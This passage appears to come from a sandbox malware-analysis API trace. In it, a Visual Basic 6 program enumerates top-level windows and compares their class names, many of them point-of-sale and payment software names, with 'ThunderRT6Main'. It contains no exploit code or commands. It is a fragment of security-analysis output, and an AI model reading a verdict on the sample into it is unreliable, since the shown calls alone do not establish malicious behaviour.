-1 [0218.252] GetWindowThreadProcessId (in: hWnd=0x2037a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa0c [0218.252] GetWindow (hWnd=0x2037a, uCmd=0x2) returned 0x2037e [0218.252] GetClassNameA (in: hWnd=0x2037e, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.252] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.252] GetWindowThreadProcessId (in: hWnd=0x2037e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa0c [0218.252] GetWindow (hWnd=0x2037e, uCmd=0x2) returned 0x30392 [0218.252] GetClassNameA (in: hWnd=0x30392, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="ConsoleWindowClass") returned 18 [0218.252] lstrcmpA (lpString1="ConsoleWindowClass", lpString2="ThunderRT6Main") returned -1 [0218.252] GetWindowThreadProcessId (in: hWnd=0x30392, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x998 [0218.252] GetWindow (hWnd=0x30392, uCmd=0x2) returned 0x70108 [0218.252] GetClassNameA (in: hWnd=0x70108, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="TASKENGINEWINDOWCLASS") returned 21 [0218.252] lstrcmpA (lpString1="TASKENGINEWINDOWCLASS", lpString2="ThunderRT6Main") returned -1 [0218.252] GetWindowThreadProcessId (in: hWnd=0x70108, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x484 [0218.252] GetWindow (hWnd=0x70108, uCmd=0x2) returned 0x20354 [0218.252] GetClassNameA (in: hWnd=0x20354, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.252] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.253] GetWindowThreadProcessId (in: hWnd=0x20354, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x484 [0218.253] GetWindow (hWnd=0x20354, uCmd=0x2) returned 0x20228 [0218.253] GetClassNameA (in: hWnd=0x20228, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="ThunderMain") returned 11 [0218.253] lstrcmpA (lpString1="ThunderMain", lpString2="ThunderRT6Main") returned -1 [0218.253] GetWindowThreadProcessId (in: hWnd=0x20228, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xae8 [0218.253] GetWindowLongA (hWnd=0x20228, nIndex=-16) returned -2080374784 [0218.253] GetWindowLongPtrA (hWnd=0x20228, nIndex=-6) returned 0x7fee4e20000 [0218.253] IsWindowEnabled (hWnd=0x20228) returned 1 [0218.253] GetPropA (hWnd=0x20228, lpString=0xc13d) returned 0x0 [0218.253] SetPropA (hWnd=0x20228, lpString=0xc13d, hData=0x1) returned 1 [0218.253] EnableWindow (hWnd=0x20228, bEnable=0) returned 0 [0218.253] GetWindow (hWnd=0x20228, uCmd=0x2) returned 0x2039c [0218.253] GetClassNameA (in: hWnd=0x2039c, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="XLMAIN") returned 6 [0218.253] lstrcmpA (lpString1="XLMAIN", lpString2="ThunderRT6Main") returned 1 [0218.253] GetWindowThreadProcessId (in: hWnd=0x2039c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xae8 [0218.253] GetWindowLongA (hWnd=0x2039c, nIndex=-16) returned 131006464 [0218.253] GetWindowLongPtrA (hWnd=0x2039c, nIndex=-6) returned 0x13f7d0000 [0218.253] GetWindowLongPtrA (hWnd=0x2039c, nIndex=-6) returned 0x13f7d0000 [0218.253] GetWindow (hWnd=0x2039c, uCmd=0x2) returned 0x2032a [0218.253] GetClassNameA (in: hWnd=0x2032a, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="ComboLBox") returned 9 [0218.253] lstrcmpA (lpString1="ComboLBox", lpString2="ThunderRT6Main") returned -1 [0218.254] GetWindowThreadProcessId (in: hWnd=0x2032a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xae8 [0218.254] GetWindowLongA (hWnd=0x2032a, nIndex=-16) returned 1149272145 [0218.254] GetWindow (hWnd=0x2032a, uCmd=0x2) returned 0x202fe [0218.254] GetClassNameA (in: hWnd=0x202fe, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="ComboLBox") returned 9 [0218.254] lstrcmpA (lpString1="ComboLBox", lpString2="ThunderRT6Main") returned -1 [0218.254] GetWindowThreadProcessId (in: hWnd=0x202fe, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xae8 [0218.254] GetWindowLongA (hWnd=0x202fe, nIndex=-16) returned 1149272145 [0218.254] GetWindow (hWnd=0x202fe, uCmd=0x2) returned 0x10346 [0218.254] GetClassNameA (in: hWnd=0x10346, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="WorkerW") returned 7 [0218.254] lstrcmpA (lpString1="WorkerW", lpString2="ThunderRT6Main") returned 1 [0218.254] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x694 [0218.254] GetWindow (hWnd=0x10346, uCmd=0x2) returned 0x202e2 [0218.254] GetClassNameA (in: hWnd=0x202e2, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="CFD File Open Message Window") returned 28 [0218.254] lstrcmpA (lpString1="CFD File Open Message Window", lpString2="ThunderRT6Main") returned -1 [0218.254] GetWindowThreadProcessId (in: hWnd=0x202e2, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xae8 [0218.254] GetWindowLongA (hWnd=0x202e2, nIndex=-16) returned 213909504 [0218.254] GetWindowLongPtrA (hWnd=0x202e2, nIndex=-6) returned 0x7feee220000 [0218.254] GetWindowLongPtrA (hWnd=0x202e2, nIndex=-6) returned 0x7feee220000 [0218.254] GetWindow (hWnd=0x202e2, uCmd=0x2) returned 0x302ba [0218.254] GetClassNameA (in: hWnd=0x302ba, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="MsoStdCompMgr") returned 13 [0218.254] lstrcmpA (lpString1="MsoStdCompMgr", lpString2="ThunderRT6Main") returned -1 [0218.254] GetWindowThreadProcessId (in: hWnd=0x302ba, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xae8 [0218.254] GetWindowLongA (hWnd=0x302ba, nIndex=-16) returned -2080374784 [0218.254] GetWindowLongPtrA (hWnd=0x302ba, nIndex=-6) returned 0x7fef13d0000 [0218.254] GetWindowLongPtrA (hWnd=0x302ba, nIndex=-6) returned 0x7fef13d0000 [0218.254] GetWindow (hWnd=0x302ba, uCmd=0x2) returned 0x10266 [0218.254] GetClassNameA (in: hWnd=0x10266, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="XLMAIN") returned 6 [0218.254] lstrcmpA (lpString1="XLMAIN", lpString2="ThunderRT6Main") returned 1 [0218.255] GetWindowThreadProcessId (in: hWnd=0x10266, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xae8 [0218.255] GetWindowLongA (hWnd=0x10266, nIndex=-16) returned 131006464 [0218.255] GetWindowLongPtrA (hWnd=0x10266, nIndex=-6) returned 0x13f7d0000 [0218.255] GetWindowLongPtrA (hWnd=0x10266, nIndex=-6) returned 0x13f7d0000 [0218.255] GetWindow (hWnd=0x10266, uCmd=0x2) returned 0x1025e [0218.255] GetClassNameA (in: hWnd=0x1025e, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="OfficePowerManagerWindow") returned 24 [0218.275] lstrcmpA (lpString1="OfficePowerManagerWindow", lpString2="ThunderRT6Main") returned -1 [0218.275] GetWindowThreadProcessId (in: hWnd=0x1025e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x91c [0218.275] GetWindow (hWnd=0x1025e, uCmd=0x2) returned 0x90254 [0218.275] GetClassNameA (in: hWnd=0x90254, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="ARC Window Class O16") returned 20 [0218.275] lstrcmpA (lpString1="ARC Window Class O16", lpString2="ThunderRT6Main") returned -1 [0218.275] GetWindowThreadProcessId (in: hWnd=0x90254, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xae8 [0218.275] GetWindowLongA (hWnd=0x90254, nIndex=-16) returned -2080374784 [0218.275] GetWindowLongPtrA (hWnd=0x90254, nIndex=-6) returned 0x13f7d0000 [0218.275] GetWindowLongPtrA (hWnd=0x90254, nIndex=-6) returned 0x13f7d0000 [0218.275] GetWindow (hWnd=0x90254, uCmd=0x2) returned 0x900a0 [0218.275] GetClassNameA (in: hWnd=0x900a0, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="DV2ControlHost") returned 14 [0218.275] lstrcmpA (lpString1="DV2ControlHost", lpString2="ThunderRT6Main") returned -1 [0218.275] GetWindowThreadProcessId (in: hWnd=0x900a0, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.275] GetWindow (hWnd=0x900a0, uCmd=0x2) returned 0x10250 [0218.276] GetClassNameA (in: hWnd=0x10250, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.276] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.276] GetWindowThreadProcessId (in: hWnd=0x10250, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xaa8 [0218.276] GetWindow (hWnd=0x10250, uCmd=0x2) returned 0x1024e [0218.276] GetClassNameA (in: hWnd=0x1024e, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="countsshadewindow") returned 17 [0218.276] lstrcmpA (lpString1="countsshadewindow", lpString2="ThunderRT6Main") returned -1 [0218.276] GetWindowThreadProcessId (in: hWnd=0x1024e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xaa8 [0218.276] GetWindow (hWnd=0x1024e, uCmd=0x2) returned 0x302b8 [0218.276] GetClassNameA (in: hWnd=0x302b8, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="OleDdeWndClass") returned 14 [0218.276] lstrcmpA (lpString1="OleDdeWndClass", lpString2="ThunderRT6Main") returned -1 [0218.276] GetWindowThreadProcessId (in: hWnd=0x302b8, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xae8 [0218.276] GetWindowLongA (hWnd=0x302b8, nIndex=-16) returned -2080374784 [0218.276] GetWindowLongPtrA (hWnd=0x302b8, nIndex=-6) returned 0x7fefeae0000 [0218.276] GetWindowLongPtrA (hWnd=0x302b8, nIndex=-6) returned 0x7fefeae0000 [0218.276] GetWindow (hWnd=0x302b8, uCmd=0x2) returned 0x202b2 [0218.276] GetClassNameA (in: hWnd=0x202b2, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="ComboLBox") returned 9 [0218.276] lstrcmpA (lpString1="ComboLBox", lpString2="ThunderRT6Main") returned -1 [0218.276] GetWindowThreadProcessId (in: hWnd=0x202b2, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xae8 [0218.276] GetWindowLongA (hWnd=0x202b2, nIndex=-16) returned 1149272145 [0218.276] GetWindow (hWnd=0x202b2, uCmd=0x2) returned 0x10288 [0218.276] GetClassNameA (in: hWnd=0x10288, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="ComboLBox") returned 9 [0218.276] lstrcmpA (lpString1="ComboLBox", lpString2="ThunderRT6Main") returned -1 [0218.276] GetWindowThreadProcessId (in: hWnd=0x10288, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xae8 [0218.276] GetWindowLongA (hWnd=0x10288, nIndex=-16) returned 1149272145 [0218.276] GetWindow (hWnd=0x10288, uCmd=0x2) returned 0x300e2 [0218.276] GetClassNameA (in: hWnd=0x300e2, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0218.276] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0218.276] GetWindowThreadProcessId (in: hWnd=0x300e2, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.276] GetWindow (hWnd=0x300e2, uCmd=0x2) returned 0x400c2 [0218.277] GetClassNameA (in: hWnd=0x400c2, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="AUTHUI.DLL: Shutdown Choices Message Window") returned 43 [0218.277] lstrcmpA (lpString1="AUTHUI.DLL: Shutdown Choices Message Window", lpString2="ThunderRT6Main") returned -1 [0218.277] GetWindowThreadProcessId (in: hWnd=0x400c2, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.277] GetWindow (hWnd=0x400c2, uCmd=0x2) returned 0x400ea [0218.277] GetClassNameA (in: hWnd=0x400ea, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="_SearchEditBoxFakeWindow") returned 24 [0218.277] lstrcmpA (lpString1="_SearchEditBoxFakeWindow", lpString2="ThunderRT6Main") returned -1 [0218.277] GetWindowThreadProcessId (in: hWnd=0x400ea, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.277] GetWindow (hWnd=0x400ea, uCmd=0x2) returned 0x300c8 [0218.277] GetClassNameA (in: hWnd=0x300c8, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0218.277] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0218.277] GetWindowThreadProcessId (in: hWnd=0x300c8, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.277] GetWindow (hWnd=0x300c8, uCmd=0x2) returned 0x300bc [0218.277] GetClassNameA (in: hWnd=0x300bc, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0218.277] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0218.277] GetWindowThreadProcessId (in: hWnd=0x300bc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.277] GetWindow (hWnd=0x300bc, uCmd=0x2) returned 0x400b2 [0218.277] GetClassNameA (in: hWnd=0x400b2, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0218.277] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0218.277] GetWindowThreadProcessId (in: hWnd=0x400b2, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.277] GetWindow (hWnd=0x400b2, uCmd=0x2) returned 0x300cc [0218.277] GetClassNameA (in: hWnd=0x300cc, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="Desktop User Picture") returned 20 [0218.277] lstrcmpA (lpString1="Desktop User Picture", lpString2="ThunderRT6Main") returned -1 [0218.277] GetWindowThreadProcessId (in: hWnd=0x300cc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4c4 [0218.277] GetWindow (hWnd=0x300cc, uCmd=0x2) returned 0x1024a [0218.277] GetClassNameA (in: hWnd=0x1024a, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="utg2_") returned 5 [0218.277] lstrcmpA (lpString1="utg2_", lpString2="ThunderRT6Main") returned 1 [0218.277] GetWindowThreadProcessId (in: hWnd=0x1024a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa98 [0218.277] GetWindow (hWnd=0x1024a, uCmd=0x2) returned 0x1024c [0218.278] GetClassNameA (in: hWnd=0x1024c, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.278] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.278] GetWindowThreadProcessId (in: hWnd=0x1024c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa98 [0218.278] GetWindow (hWnd=0x1024c, uCmd=0x2) returned 0x10246 [0218.278] GetClassNameA (in: hWnd=0x10246, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="spgagentservicewnd") returned 18 [0218.278] lstrcmpA (lpString1="spgagentservicewnd", lpString2="ThunderRT6Main") returned -1 [0218.278] GetWindowThreadProcessId (in: hWnd=0x10246, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa88 [0218.278] GetWindow (hWnd=0x10246, uCmd=0x2) returned 0x10248 [0218.278] GetClassNameA (in: hWnd=0x10248, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.278] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.278] GetWindowThreadProcessId (in: hWnd=0x10248, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa88 [0218.278] GetWindow (hWnd=0x10248, uCmd=0x2) returned 0x10242 [0218.278] GetClassNameA (in: hWnd=0x10242, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="spcwin") returned 6 [0218.278] lstrcmpA (lpString1="spcwin", lpString2="ThunderRT6Main") returned -1 [0218.278] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa78 [0218.278] GetWindow (hWnd=0x10242, uCmd=0x2) returned 0x10244 [0218.278] GetClassNameA (in: hWnd=0x10244, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.278] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.278] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa78 [0218.278] GetWindow (hWnd=0x10244, uCmd=0x2) returned 0x1023e [0218.278] GetClassNameA (in: hWnd=0x1023e, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="omniposwindow") returned 13 [0218.278] lstrcmpA (lpString1="omniposwindow", lpString2="ThunderRT6Main") returned -1 [0218.278] GetWindowThreadProcessId (in: hWnd=0x1023e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa68 [0218.278] GetWindow (hWnd=0x1023e, uCmd=0x2) returned 0x10240 [0218.278] GetClassNameA (in: hWnd=0x10240, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.278] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.278] GetWindowThreadProcessId (in: hWnd=0x10240, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa68 [0218.278] GetWindow (hWnd=0x10240, uCmd=0x2) returned 0x1023a [0218.279] GetClassNameA (in: hWnd=0x1023a, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="mxslipstream_class") returned 18 [0218.279] lstrcmpA (lpString1="mxslipstream_class", lpString2="ThunderRT6Main") returned -1 [0218.279] GetWindowThreadProcessId (in: hWnd=0x1023a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa58 [0218.279] GetWindow (hWnd=0x1023a, uCmd=0x2) returned 0x1023c [0218.279] GetClassNameA (in: hWnd=0x1023c, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.279] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.279] GetWindowThreadProcessId (in: hWnd=0x1023c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa58 [0218.279] GetWindow (hWnd=0x1023c, uCmd=0x2) returned 0x10236 [0218.279] GetClassNameA (in: hWnd=0x10236, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="issposwin") returned 9 [0218.279] lstrcmpA (lpString1="issposwin", lpString2="ThunderRT6Main") returned -1 [0218.279] GetWindowThreadProcessId (in: hWnd=0x10236, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa48 [0218.279] GetWindow (hWnd=0x10236, uCmd=0x2) returned 0x10238 [0218.279] GetClassNameA (in: hWnd=0x10238, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.279] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.279] GetWindowThreadProcessId (in: hWnd=0x10238, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa48 [0218.279] GetWindow (hWnd=0x10238, uCmd=0x2) returned 0x10232 [0218.279] GetClassNameA (in: hWnd=0x10232, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="fposclass") returned 9 [0218.279] lstrcmpA (lpString1="fposclass", lpString2="ThunderRT6Main") returned -1 [0218.279] GetWindowThreadProcessId (in: hWnd=0x10232, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa38 [0218.279] GetWindow (hWnd=0x10232, uCmd=0x2) returned 0x10234 [0218.279] GetClassNameA (in: hWnd=0x10234, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.279] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.279] GetWindowThreadProcessId (in: hWnd=0x10234, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa38 [0218.279] GetWindow (hWnd=0x10234, uCmd=0x2) returned 0x1022e [0218.279] GetClassNameA (in: hWnd=0x1022e, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="edcsvrwindow") returned 12 [0218.279] lstrcmpA (lpString1="edcsvrwindow", lpString2="ThunderRT6Main") returned -1 [0218.279] GetWindowThreadProcessId (in: hWnd=0x1022e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa28 [0218.280] GetWindow (hWnd=0x1022e, uCmd=0x2) returned 0x10230 [0218.280] GetClassNameA (in: hWnd=0x10230, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.280] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.280] GetWindowThreadProcessId (in: hWnd=0x10230, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa28 [0218.280] GetWindow (hWnd=0x10230, uCmd=0x2) returned 0x1022a [0218.280] GetClassNameA (in: hWnd=0x1022a, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="creditservice_wnd") returned 17 [0218.280] lstrcmpA (lpString1="creditservice_wnd", lpString2="ThunderRT6Main") returned -1 [0218.280] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa18 [0218.280] GetWindow (hWnd=0x1022a, uCmd=0x2) returned 0x1022c [0218.280] GetClassNameA (in: hWnd=0x1022c, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.280] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.280] GetWindowThreadProcessId (in: hWnd=0x1022c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa18 [0218.280] GetWindow (hWnd=0x1022c, uCmd=0x2) returned 0x10224 [0218.280] GetClassNameA (in: hWnd=0x10224, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="centralcreditcardwnd") returned 20 [0218.280] lstrcmpA (lpString1="centralcreditcardwnd", lpString2="ThunderRT6Main") returned -1 [0218.280] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa08 [0218.280] GetWindow (hWnd=0x10224, uCmd=0x2) returned 0x10226 [0218.280] GetClassNameA (in: hWnd=0x10226, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.280] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.280] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xa08 [0218.280] GetWindow (hWnd=0x10226, uCmd=0x2) returned 0x10220 [0218.280] GetClassNameA (in: hWnd=0x10220, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="ccv_server_win") returned 14 [0218.280] lstrcmpA (lpString1="ccv_server_win", lpString2="ThunderRT6Main") returned -1 [0218.280] GetWindowThreadProcessId (in: hWnd=0x10220, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9f8 [0218.280] GetWindow (hWnd=0x10220, uCmd=0x2) returned 0x10222 [0218.280] GetClassNameA (in: hWnd=0x10222, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.280] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.280] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9f8 [0218.281] GetWindow (hWnd=0x10222, uCmd=0x2) returned 0x1021c [0218.281] GetClassNameA (in: hWnd=0x1021c, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="aldelo_win") returned 10 [0218.281] lstrcmpA (lpString1="aldelo_win", lpString2="ThunderRT6Main") returned -1 [0218.281] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9e8 [0218.281] GetWindow (hWnd=0x1021c, uCmd=0x2) returned 0x1021e [0218.281] GetClassNameA (in: hWnd=0x1021e, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.281] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.281] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9e8 [0218.281] GetWindow (hWnd=0x1021e, uCmd=0x2) returned 0x10218 [0218.281] GetClassNameA (in: hWnd=0x10218, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="afr38") returned 5 [0218.281] lstrcmpA (lpString1="afr38", lpString2="ThunderRT6Main") returned -1 [0218.281] GetWindowThreadProcessId (in: hWnd=0x10218, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9d8 [0218.281] GetWindow (hWnd=0x10218, uCmd=0x2) returned 0x1021a [0218.281] GetClassNameA (in: hWnd=0x1021a, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.281] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.281] GetWindowThreadProcessId (in: hWnd=0x1021a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9d8 [0218.281] GetWindow (hWnd=0x1021a, uCmd=0x2) returned 0x10214 [0218.281] GetClassNameA (in: hWnd=0x10214, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="accuposwnd") returned 10 [0218.281] lstrcmpA (lpString1="accuposwnd", lpString2="ThunderRT6Main") returned -1 [0218.281] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9c8 [0218.281] GetWindow (hWnd=0x10214, uCmd=0x2) returned 0x10216 [0218.281] GetClassNameA (in: hWnd=0x10216, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.281] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.281] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9c8 [0218.281] GetWindow (hWnd=0x10216, uCmd=0x2) returned 0x10210 [0218.281] GetClassNameA (in: hWnd=0x10210, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="active-chargewnd") returned 16 [0218.281] lstrcmpA (lpString1="active-chargewnd", lpString2="ThunderRT6Main") returned -1 [0218.282] GetWindowThreadProcessId (in: hWnd=0x10210, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9b4 [0218.282] GetWindow (hWnd=0x10210, uCmd=0x2) returned 0x10212 [0218.282] GetClassNameA (in: hWnd=0x10212, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.282] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.282] GetWindowThreadProcessId (in: hWnd=0x10212, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9b4 [0218.282] GetWindow (hWnd=0x10212, uCmd=0x2) returned 0x1020a [0218.282] GetClassNameA (in: hWnd=0x1020a, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="yahoomessenger_window") returned 21 [0218.282] lstrcmpA (lpString1="yahoomessenger_window", lpString2="ThunderRT6Main") returned 1 [0218.282] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9a4 [0218.282] GetWindow (hWnd=0x1020a, uCmd=0x2) returned 0x1020e [0218.282] GetClassNameA (in: hWnd=0x1020e, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.282] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.282] GetWindowThreadProcessId (in: hWnd=0x1020e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9a4 [0218.282] GetWindow (hWnd=0x1020e, uCmd=0x2) returned 0x10206 [0218.282] GetClassNameA (in: hWnd=0x10206, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="winscpwnd") returned 9 [0218.282] lstrcmpA (lpString1="winscpwnd", lpString2="ThunderRT6Main") returned 1 [0218.282] GetWindowThreadProcessId (in: hWnd=0x10206, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x994 [0218.282] GetWindow (hWnd=0x10206, uCmd=0x2) returned 0x10208 [0218.282] GetClassNameA (in: hWnd=0x10208, lpClassName=0x1ee180, nMaxCount=64 | out: lpClassName="IME") returned 3 [0218.282] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0218.282] GetWindowThreadProcessId (in: hWnd=0x10208, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x994 [0218.282] GetWindow (hWnd=0x10208, uCmd=0x2) returned 0x10202 